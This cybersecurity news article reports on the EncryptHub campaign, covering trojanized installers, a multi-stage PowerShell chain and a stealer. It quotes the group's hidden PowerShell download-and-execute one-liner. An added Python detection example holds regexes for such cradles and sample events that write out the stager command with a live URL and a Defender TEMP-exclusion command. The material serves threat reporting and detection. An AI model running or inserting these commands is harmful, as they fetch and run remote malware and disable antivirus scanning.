EncryptHub A Multi-Stage Malware Compromised 600 Organizations

A sophisticated cybercriminal group known as EncryptHub has successfully compromised approximately 600 organizations through a multi-stage malware campaign.
The threat actor exploited operational security mistakes, inadvertently exposing critical elements of their infrastructure, which allowed researchers to map their tactics with unprecedented depth.
EncryptHub’s campaign employs several layers of PowerShell scripts to gather system data, exfiltrate valuable information, execute evasion techniques, and deploy information stealers.
The threat actor has been observed targeting users of popular applications by distributing trojanized versions of software such as QQ Talk, WeChat, Microsoft Visual Studio 2022, and Palo Alto Global Protect.
These fake applications were generated between November 25th, 2024, and January 1st, 2025.
These applications were signed with code-signing certificates to appear legitimate, including one registered to “HOA SEN HA NAM ONE MEMBER LIMITED LIABILITIES COMPANY” which has since been revoked.
As of February 4th, 2025, the group began using a new certificate registered to “Encrypthub LLC,” further demonstrating their evolving tactics.
The attackers have also leveraged third-party distribution channels, including a pay-per-install service called “LabInstalls” that operates via a Telegram bot, allowing them to expand their reach and automate the deployment of malicious payloads to unsuspecting victims.
Outpost24’s KrakenLabs researchers discovered that EncryptHub prioritizes credential logs stolen from victims based on cryptocurrency ownership, corporate network affiliation, and the presence of VPN software, indicating sophisticated targeting methods.
EncryptHub’s Evolving Kill Chain
The multi-stage attack begins with a PowerShell one-liner that fetches the first-stage payload and executes it in memory: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-RestMethod -Uri 'hxxps://encrypthub[.]us/encrypthub/fickle/payload.ps1' | Invoke-Expression". The -ExecutionPolicy Bypass and -WindowStyle Hidden switches disable the script execution policy and hide the console window, and piping the Invoke-RestMethod response into Invoke-Expression runs the downloaded script without writing it to disk.
This initial payload is responsible for stealing sensitive data including messaging sessions, crypto wallets, password manager files, and VPN sessions.
The second stage involves runner.ps1, which carries base64-encoded MSC files; the script decodes them, modifies them to embed malicious URLs, and executes them.
The third stage employs an HTML loader that adds the TEMP folder to the Windows Defender exclusion list, so later payloads dropped there are not scanned, and then downloads additional scripts.
The final stage deploys Rhadamanthys malware, completing the infection chain.
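As an added example (not code from the article, from Outpost24's KrakenLabs, or from the threat actor), the following Python routine runs the indicators from the kill chain above over constructed process-creation events: hidden, policy-bypassing PowerShell; an Invoke-RestMethod piped into Invoke-Expression download cradle; a Defender exclusion for the TEMP folder; and the stager host, which the article gives defanged as encrypthub[.]us. The event field layout, the indicator names, the severity rule and the sample command lines are assumptions made for this example.

```python
import re

# Added example: triage of process-creation events (e.g. Sysmon EventID 1 fields)
# for the EncryptHub kill-chain indicators described in the article. Field
# layout and sample events are constructed for this example, not real telemetry.

# The article gives the stager host defanged as encrypthub[.]us; it is re-fanged
# here so it can be matched against a raw command line.
KNOWN_STAGER_HOSTS = {"encrypthub.us"}

PATTERNS = {
    # -ExecutionPolicy Bypass and -WindowStyle Hidden, in either order
    "hidden_bypass_powershell": re.compile(
        r"powershell(?:\.exe)?\b(?=.*-executionpolicy\s+bypass)(?=.*-windowstyle\s+hidden)",
        re.I | re.S),
    # download cradle: Invoke-RestMethod piped straight into Invoke-Expression / iex
    "download_cradle_irm_iex": re.compile(
        r"invoke-restmethod\b.*\|\s*(?:invoke-expression|iex)\b", re.I | re.S),
    # Defender exclusion added for the TEMP directory ($env:TEMP or a ...\Temp path)
    "defender_temp_exclusion": re.compile(
        r"add-mppreference\b.*-exclusionpath\s+\S*(?:\$env:temp\b|\\temp\b)", re.I | re.S),
}

URL_HOST = re.compile(r"https?://([a-z0-9.-]+)", re.I)


def score_cmdline(cmdline: str) -> list[str]:
    """Return the names of every indicator that matches one command line."""
    hits = [name for name, rx in PATTERNS.items() if rx.search(cmdline)]
    m = URL_HOST.search(cmdline)
    if m and m.group(1).lower() in KNOWN_STAGER_HOSTS:
        hits.append("known_stager_host")
    return hits


def triage(events: list[tuple[str, str, str]]) -> list[dict]:
    """events are (timestamp, image path, command line) tuples.
    Returns one finding per event with at least one hit, most severe first."""
    findings = []
    for ts, image, cmdline in events:
        hits = score_cmdline(cmdline)
        if not hits:
            continue
        # A known stager host, or two independent indicators on one command line,
        # is worth paging on; a single generic indicator is worth a look.
        severity = "high" if "known_stager_host" in hits or len(hits) >= 2 else "medium"
        findings.append({"ts": ts, "image": image, "hits": hits, "severity": severity})
    findings.sort(key=lambda f: (f["severity"] != "high", f["ts"]))
    return findings


# Constructed sample events (not real telemetry). Event 1 mirrors the stager
# command quoted in the article; event 2 mirrors the third-stage Defender
# exclusion; events 3 and 4 are benign admin activity a looser rule would flag.
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ("2025-01-10T09:12:01Z", PS_IMAGE,
     "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "
     "\"Invoke-RestMethod -Uri 'https://encrypthub.us/encrypthub/fickle/payload.ps1' "
     "| Invoke-Expression\""),
    ("2025-01-10T09:12:07Z", PS_IMAGE,
     r'powershell.exe -Command "Add-MpPreference -ExclusionPath $env:TEMP"'),
    ("2025-01-10T09:30:00Z", PS_IMAGE,
     r'powershell.exe -NoProfile -Command "Get-Service -Name Spooler"'),
    ("2025-01-10T09:31:15Z", PS_IMAGE,
     r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\build.ps1"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["ts"], ", ".join(f["hits"]))
```

The patterns deliberately require the pipe form of the cradle, so a nested variant such as iex (irm ...) only trips the hidden/bypass indicator; in production, pair command-line matching with PowerShell Script Block Logging (Event ID 4104) and with Defender's own configuration-change events, which record exclusion additions regardless of how the cmdlet was invoked.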
EncryptHub’s kill chain shows the progression from initial execution through multiple stages to final payload deployment.
The group is also developing “EncryptRAT,” a command-and-control panel that manages infections and sends remote commands, suggesting they may soon commercialize this tool to other threat actors.
Organizations are advised to implement multi-layered security strategies and continuous monitoring to protect against this evolving threat.
The post EncryptHub A Multi-Stage Malware Compromised 600 Organizations appeared first on Cyber Security News.